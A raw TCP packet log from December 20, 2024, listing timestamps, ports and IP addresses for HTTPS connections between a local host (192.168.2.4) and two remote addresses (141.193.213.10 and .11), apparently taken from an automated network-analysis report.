                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.789067030 CET44349864141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.789143085 CET49864443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.789179087 CET44349855141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.789324999 CET44349855141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.789392948 CET49855443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.789417028 CET44349855141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.789608002 CET49864443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.789639950 CET44349864141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.789686918 CET44349855141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.790056944 CET49855443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.791085958 CET49855443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.791115046 CET44349855141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.791410923 CET49865443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.791436911 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.791742086 CET49865443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.792011023 CET44349852141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.792094946 CET44349852141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.792160988 CET49852443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.792213917 CET49865443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.792231083 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.793078899 CET44349853141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.793138027 CET49853443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.793154001 CET44349853141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.793556929 CET49852443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.793562889 CET44349852141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.793762922 CET49866443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.793783903 CET44349866141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.793936968 CET49866443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.794622898 CET49866443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.794647932 CET44349866141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.801457882 CET44349853141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.801516056 CET49853443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.801529884 CET44349853141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.801551104 CET44349853141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.801667929 CET49853443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.802565098 CET49853443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.802578926 CET44349853141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.803030014 CET49867443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.803044081 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.803097010 CET49867443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.803585052 CET49867443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.803596973 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.895838022 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.896239042 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.896312952 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.897418022 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.897728920 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.897866964 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.897878885 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.897903919 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:57.947547913 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.173013926 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.173290968 CET49857443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.173301935 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.173588991 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.173991919 CET49857443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.174055099 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.174159050 CET49857443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.219335079 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.227801085 CET49857443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.342591047 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.342765093 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.342829943 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.342861891 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.342956066 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.343044996 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.343070984 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.343105078 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.343245983 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.343259096 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.350442886 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.350507021 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.350522041 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.355619907 CET44349858141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.355884075 CET49858443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.355902910 CET44349858141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.357001066 CET44349858141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.357295990 CET49858443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.357444048 CET49858443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.357455015 CET44349858141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.357476950 CET44349858141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.360384941 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.360567093 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.360580921 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.405966997 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.410650015 CET49858443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.430226088 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.430419922 CET49859443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.430438995 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.430881023 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.431162119 CET49859443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.431236029 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.431268930 CET49859443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.437010050 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.437205076 CET49860443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.437238932 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.438374043 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.438647032 CET49860443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.438743114 CET49860443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.438755035 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.438826084 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.463027954 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.471328974 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.473958015 CET49859443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.479516029 CET44349861141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.479727983 CET49861443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.479773045 CET44349861141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.483268023 CET44349861141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.483355045 CET49861443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.483663082 CET49861443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.483778954 CET49861443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.483791113 CET44349861141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.483835936 CET44349861141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.489764929 CET49860443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.505194902 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.535026073 CET49861443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.535048008 CET44349861141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.538192987 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.542500019 CET44349862141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.542720079 CET49862443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.542752028 CET44349862141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.543838978 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.543860912 CET44349862141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.543955088 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.543972015 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.544548035 CET49862443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.544714928 CET44349862141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.544940948 CET49862443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.585010052 CET49861443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.585258007 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.587413073 CET44349862141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.781714916 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.781919003 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782011986 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782077074 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782125950 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782202959 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782217026 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782310963 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782392025 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782414913 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782430887 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782496929 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782509089 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782619953 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782670021 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.782682896 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822629929 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822664022 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822696924 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822701931 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822716951 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822729111 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822756052 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822777987 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822779894 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822784901 CET49857443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822799921 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822825909 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822829008 CET49857443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822829008 CET49857443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822838068 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822839975 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822887897 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822921038 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822979927 CET49857443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822985888 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.822998047 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823110104 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823162079 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823174953 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823287964 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823349953 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823362112 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823466063 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823554039 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823606014 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823618889 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823663950 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823676109 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823786020 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823838949 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.823852062 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.824714899 CET49857443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.824724913 CET44349857141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.851845980 CET44349858141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.852094889 CET44349858141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.852778912 CET49858443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.853446007 CET49858443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.853473902 CET44349858141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.853844881 CET49868443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.853928089 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.854001045 CET49868443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.855479956 CET49868443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.855513096 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.860816002 CET49869443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.860847950 CET44349869141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.860980034 CET49869443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.861411095 CET49869443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.861418962 CET44349869141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.865267038 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.873383999 CET44349863141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.874356031 CET49863443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.874406099 CET44349863141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.875885963 CET44349863141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.875965118 CET49863443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.876283884 CET49863443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.876369953 CET44349863141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.876406908 CET49863443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.905390978 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.905466080 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.905525923 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.917249918 CET49863443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.917269945 CET44349863141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.920953035 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.921019077 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.921035051 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.921195030 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.942538977 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.942559958 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.942611933 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.943562984 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.943581104 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.943645000 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.943917990 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.958770990 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.958805084 CET49863443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.958834887 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.965285063 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.965403080 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.978385925 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.978458881 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.984998941 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.985076904 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.998181105 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:58.998255014 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.000638962 CET44349864141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.000849009 CET49864443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.000910997 CET44349864141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.001384020 CET44349864141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.001658916 CET49864443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.001758099 CET49864443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.001770020 CET44349864141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.001786947 CET44349864141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.004223108 CET44349866141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.004426003 CET49866443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.004441023 CET44349866141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.005326986 CET44349866141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.005404949 CET49866443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.006337881 CET49866443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.006400108 CET44349866141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.006495953 CET49866443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.009509087 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.009728909 CET49865443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.009752989 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.010867119 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.011018038 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.011082888 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.011352062 CET49865443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.011497021 CET49865443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.011509895 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.011533022 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.017374992 CET44349856141.193.213.10192.168.2.4
